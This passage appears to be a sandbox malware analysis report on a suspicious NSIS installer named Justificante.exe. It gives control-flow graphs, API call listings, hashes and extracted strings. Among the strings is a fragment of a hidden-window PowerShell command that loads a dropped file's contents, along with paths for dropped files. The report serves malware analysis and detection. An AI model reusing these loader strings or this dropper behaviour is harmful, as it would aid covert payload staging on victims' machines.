                          control_flow_graph 419 403c0b-403c23 call 406931 422 403c25-403c35 call 406483 419->422 423 403c37-403c6e call 40640a 419->423 430 403c91-403cba call 403ee1 call 405f19 422->430 428 403c70-403c81 call 40640a 423->428 429 403c86-403c8c lstrcatW 423->429 428->429 429->430 437 403cc0-403cc5 430->437 438 403d4c-403d54 call 405f19 430->438 437->438 439 403ccb-403ce5 call 40640a 437->439 444 403d62-403d87 LoadImageW 438->444 445 403d56-403d5d call 406579 438->445 443 403cea-403cf3 439->443 443->438 446 403cf5-403cf9 443->446 448 403e08-403e10 call 40140b 444->448 449 403d89-403db9 RegisterClassW 444->449 445->444 451 403d0b-403d17 lstrlenW 446->451 452 403cfb-403d08 call 405e3e 446->452 460 403e12-403e15 448->460 461 403e1a-403e25 call 403ee1 448->461 453 403ed7 449->453 454 403dbf-403e03 SystemParametersInfoW CreateWindowExW 449->454 458 403d19-403d27 lstrcmpiW 451->458 459 403d3f-403d47 call 405e11 call 40653c 451->459 452->451 457 403ed9-403ee0 453->457 454->448 458->459 464 403d29-403d33 GetFileAttributesW 458->464 459->438 460->457 472 403e2b-403e45 ShowWindow call 4068c1 461->472 473 403eae-403eaf call 405677 461->473 465 403d35-403d37 464->465 466 403d39-403d3a call 405e5d 464->466 465->459 465->466 466->459 480 403e51-403e63 GetClassInfoW 472->480 481 403e47-403e4c call 4068c1 472->481 476 403eb4-403eb6 473->476 478 403ed0-403ed2 call 40140b 476->478 479 403eb8-403ebe 476->479 478->453 479->460 482 403ec4-403ecb call 40140b 479->482 485 403e65-403e75 GetClassInfoW RegisterClassW 480->485 486 403e7b-403e9e DialogBoxParamW call 40140b 480->486 481->480 482->460 485->486 490 403ea3-403eac call 403b5b 486->490 490->457
                          APIs
                            • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                            • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                          • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Justificante.exe",00000000), ref: 00403C8C
                          • lstrlenW.KERNEL32(trikinse,?,?,?,trikinse,00000000,C:\Users\user\AppData\Local\unavailability\unmeliorated,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,76F93420), ref: 00403D0C
                          • lstrcmpiW.KERNEL32(?,.exe,trikinse,?,?,?,trikinse,00000000,C:\Users\user\AppData\Local\unavailability\unmeliorated,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                          • GetFileAttributesW.KERNEL32(trikinse), ref: 00403D2A
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unavailability\unmeliorated), ref: 00403D73
                            • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                          • RegisterClassW.USER32(00429200), ref: 00403DB0
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                          • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                          • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                          • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                          • RegisterClassW.USER32(00429200), ref: 00403E75
                          • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unavailability\unmeliorated$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$trikinse
                          • API String ID: 1975747703-1054394960
                          • Opcode ID: 92681064c2eb18a8eb976b4004cb2b2121f5eb92f5676c9d8e5c00cebc89f70e
                          • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                          • Opcode Fuzzy Hash: 92681064c2eb18a8eb976b4004cb2b2121f5eb92f5676c9d8e5c00cebc89f70e
                          • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 493 403068-4030b6 GetTickCount GetModuleFileNameW call 406032 496 4030c2-4030f0 call 40653c call 405e5d call 40653c GetFileSize 493->496 497 4030b8-4030bd 493->497 505 4030f6 496->505 506 4031db-4031e9 call 402fc6 496->506 498 403302-403306 497->498 508 4030fb-403112 505->508 512 4032ba-4032bf 506->512 513 4031ef-4031f2 506->513 510 403114 508->510 511 403116-40311f call 40357a 508->511 510->511 520 403125-40312c 511->520 521 403276-40327e call 402fc6 511->521 512->498 515 4031f4-40320c call 403590 call 40357a 513->515 516 40321e-40326a GlobalAlloc call 406a8c call 406061 CreateFileW 513->516 515->512 544 403212-403218 515->544 542 403280-4032b0 call 403590 call 403309 516->542 543 40326c-403271 516->543 525 4031a8-4031ac 520->525 526 40312e-403142 call 405fed 520->526 521->512 531 4031b6-4031bc 525->531 532 4031ae-4031b5 call 402fc6 525->532 526->531 540 403144-40314b 526->540 533 4031cb-4031d3 531->533 534 4031be-4031c8 call 406a1e 531->534 532->531 533->508 541 4031d9 533->541 534->533 540->531 547 40314d-403154 540->547 541->506 554 4032b5-4032b8 542->554 543->498 544->512 544->516 547->531 549 403156-40315d 547->549 549->531 551 40315f-403166 549->551 551->531 553 403168-403188 551->553 553->512 555 40318e-403192 553->555 554->512 556 4032c1-4032d2 554->556 557 403194-403198 555->557 558 40319a-4031a2 555->558 559 4032d4 556->559 560 4032da-4032df 556->560 557->541 557->558 558->531 562 4031a4-4031a6 558->562 559->560 561 4032e0-4032e6 560->561 561->561 563 4032e8-403300 call 405fed 561->563 562->531 563->498
                          APIs
                          • GetTickCount.KERNEL32 ref: 0040307C
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Justificante.exe,00000400), ref: 00403098
                            • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00406036
                            • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante.exe,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 004030E1
                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403223
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Justificante.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 2803837635-2304521926
                          • Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                          • Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
                          • Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
                          • Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 566 406579-406584 567 406586-406595 566->567 568 406597-4065ad 566->568 567->568 569 4065b3-4065c0 568->569 570 4067c5-4067cb 568->570 569->570 571 4065c6-4065cd 569->571 572 4067d1-4067dc 570->572 573 4065d2-4065df 570->573 571->570 575 4067e7-4067e8 572->575 576 4067de-4067e2 call 40653c 572->576 573->572 574 4065e5-4065f1 573->574 577 4067b2 574->577 578 4065f7-406635 574->578 576->575 582 4067c0-4067c3 577->582 583 4067b4-4067be 577->583 580 406755-406759 578->580 581 40663b-406646 578->581 586 40675b-406761 580->586 587 40678c-406790 580->587 584 406648-40664d 581->584 585 40665f 581->585 582->570 583->570 584->585 590 40664f-406652 584->590 593 406666-40666d 585->593 591 406771-40677d call 40653c 586->591 592 406763-40676f call 406483 586->592 588 406792-40679a call 406579 587->588 589 40679f-4067b0 lstrlenW 587->589 588->589 589->570 590->585 596 406654-406657 590->596 602 406782-406788 591->602 592->602 598 406672-406674 593->598 599 40666f-406671 593->599 596->585 603 406659-40665d 596->603 600 406676-406694 call 40640a 598->600 601 4066af-4066b2 598->601 599->598 609 406699-40669d 600->609 607 4066c2-4066c5 601->607 608 4066b4-4066c0 GetSystemDirectoryW 601->608 602->589 606 40678a 602->606 603->593 610 40674d-406753 call 4067eb 606->610 612 406730-406732 607->612 613 4066c7-4066d5 GetWindowsDirectoryW 607->613 611 406734-406738 608->611 614 4066a3-4066aa call 406579 609->614 615 40673d-406740 609->615 610->589 611->610 617 40673a 611->617 612->611 616 4066d7-4066e1 612->616 613->612 614->611 615->610 620 406742-406748 lstrcatW 615->620 622 4066e3-4066e6 616->622 623 4066fb-406711 SHGetSpecialFolderLocation 616->623 617->615 620->610 622->623 627 4066e8-4066ef 622->627 624 406713-40672a SHGetPathFromIDListW CoTaskMemFree 623->624 625 40672c 623->625 624->611 624->625 625->612 628 4066f7-4066f9 627->628 628->611 628->623
                          APIs
                          • GetSystemDirectoryW.KERNEL32(trikinse,00000400), ref: 004066BA
                          • GetWindowsDirectoryW.KERNEL32(trikinse,00000400,00000000,lgmnd,?,004055DB,lgmnd,00000000), ref: 004066CD
                          • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,lgmnd,?,004055DB,lgmnd,00000000), ref: 00406709
                          • SHGetPathFromIDListW.SHELL32(00000000,trikinse), ref: 00406717
                          • CoTaskMemFree.OLE32(00000000), ref: 00406722
                          • lstrcatW.KERNEL32(trikinse,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                          • lstrlenW.KERNEL32(trikinse,00000000,lgmnd,?,004055DB,lgmnd,00000000), ref: 004067A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                          • String ID: "powershell.exe" -windowstyle hidden "$Florsukkeres=Get-Content -raw 'C:\Users\user\AppData\Local\unavailability\unmeliorated\Dare$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$lgmnd$trikinse
                          • API String ID: 717251189-188375809
                          • Opcode ID: 1601c4d7d9683424531442411e17d8d829d5785fc277012caaf8ee8b864246b8
                          • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
                          • Opcode Fuzzy Hash: 1601c4d7d9683424531442411e17d8d829d5785fc277012caaf8ee8b864246b8
                          • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 693 40176f-401794 call 402d3e call 405e88 698 401796-40179c call 40653c 693->698 699 40179e-4017b0 call 40653c call 405e11 lstrcatW 693->699 704 4017b5-4017b6 call 4067eb 698->704 699->704 708 4017bb-4017bf 704->708 709 4017c1-4017cb call 40689a 708->709 710 4017f2-4017f5 708->710 717 4017dd-4017ef 709->717 718 4017cd-4017db CompareFileTime 709->718 711 4017f7-4017f8 call 40600d 710->711 712 4017fd-401819 call 406032 710->712 711->712 720 40181b-40181e 712->720 721 40188d-4018b6 call 4055a4 call 403309 712->721 717->710 718->717 722 401820-40185e call 40653c * 2 call 406579 call 40653c call 405ba2 720->722 723 40186f-401879 call 4055a4 720->723 733 4018b8-4018bc 721->733 734 4018be-4018ca SetFileTime 721->734 722->708 755 401864-401865 722->755 735 401882-401888 723->735 733->734 737 4018d0-4018db CloseHandle 733->737 734->737 738 402bcb 735->738 741 4018e1-4018e4 737->741 742 402bc2-402bc5 737->742 743 402bcd-402bd1 738->743 745 4018e6-4018f7 call 406579 lstrcatW 741->745 746 4018f9-4018fc call 406579 741->746 742->738 752 401901-40239a call 405ba2 745->752 746->752 752->742 752->743 755->735 757 401867-401868 755->757 757->723
                          APIs
                          • lstrcatW.KERNEL32(00000000,00000000,Formeredes,C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer,?,?,00000031), ref: 004017B0
                          • CompareFileTime.KERNEL32(-00000014,?,Formeredes,Formeredes,00000000,00000000,Formeredes,C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer,?,?,00000031), ref: 004017D5
                            • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                            • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                            • Part of subcall function 004055A4: lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                            • Part of subcall function 004055A4: SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                            • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\ProgramData\bestializing\slagtehuset.spo$C:\Users\user\AppData\Local\unavailability\unmeliorated\Organisationsmeddelelses\Konfronteringer$C:\Windows\baksendes$Formeredes
                          • API String ID: 1941528284-3008734590
                          • Opcode ID: 03aac883e9dccf037591db3b07fc1ea700b4f7353d4f51fba005101ecdd61089
                          • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                          • Opcode Fuzzy Hash: 03aac883e9dccf037591db3b07fc1ea700b4f7353d4f51fba005101ecdd61089
                          • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 759 4055a4-4055b9 760 405670-405674 759->760 761 4055bf-4055d0 759->761 762 4055d2-4055d6 call 406579 761->762 763 4055db-4055e7 lstrlenW 761->763 762->763 765 405604-405608 763->765 766 4055e9-4055f9 lstrlenW 763->766 768 405617-40561b 765->768 769 40560a-405611 SetWindowTextW 765->769 766->760 767 4055fb-4055ff lstrcatW 766->767 767->765 770 405661-405663 768->770 771 40561d-40565f SendMessageW * 3 768->771 769->768 770->760 772 405665-405668 770->772 771->770 772->760
                          APIs
                          • lstrlenW.KERNEL32(lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                          • lstrlenW.KERNEL32(00403040,lgmnd,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                          • lstrcatW.KERNEL32(lgmnd,00403040,00403040,lgmnd,00000000,00000000,00000000), ref: 004055FF
                          • SetWindowTextW.USER32(lgmnd,lgmnd), ref: 00405611
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID: lgmnd
                          • API String ID: 2531174081-3451853296
                          • Opcode ID: 821461bf1a3e0c9a0b9dfd66dfa0b62158b528cadb26a9773dc4f9578ba51fec
                          • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
                          • Opcode Fuzzy Hash: 821461bf1a3e0c9a0b9dfd66dfa0b62158b528cadb26a9773dc4f9578ba51fec
                          • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 773 405a73-405abe CreateDirectoryW 774 405ac0-405ac2 773->774 775 405ac4-405ad1 GetLastError 773->775 776 405aeb-405aed 774->776 775->776 777 405ad3-405ae7 SetFileSecurityW 775->777 777->774 778 405ae9 GetLastError 777->778 778->776
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                          • GetLastError.KERNEL32 ref: 00405ACA
                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                          • GetLastError.KERNEL32 ref: 00405AE9
                          Strings
                          • C:\Users\user\Desktop, xrefs: 00405A73
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                          • API String ID: 3449924974-1729097607
                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                          • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                          • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 779 4068c1-4068e1 GetSystemDirectoryW 780 4068e3 779->780 781 4068e5-4068e7 779->781 780->781 782 4068f8-4068fa 781->782 783 4068e9-4068f2 781->783 785 4068fb-40692e wsprintfW LoadLibraryExW 782->785 783->782 784 4068f4-4068f6 783->784 784->785
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                          • wsprintfW.USER32 ref: 00406913
                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406927
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%S.dll$UXTHEME$\
                          • API String ID: 2200240437-1946221925
                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                          • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                          • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 786 406061-40606d 787 40606e-4060a2 GetTickCount GetTempFileNameW 786->787 788 4060b1-4060b3 787->788 789 4060a4-4060a6 787->789 791 4060ab-4060ae 788->791 789->787 790 4060a8 789->790 790->791
                          APIs
                          • GetTickCount.KERNEL32 ref: 0040607F
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Justificante.exe",004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
                          Strings
                          • "C:\Users\user\Desktop\Justificante.exe", xrefs: 00406061
                          • nsa, xrefs: 0040606E
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\Desktop\Justificante.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-311323776
                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                          • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
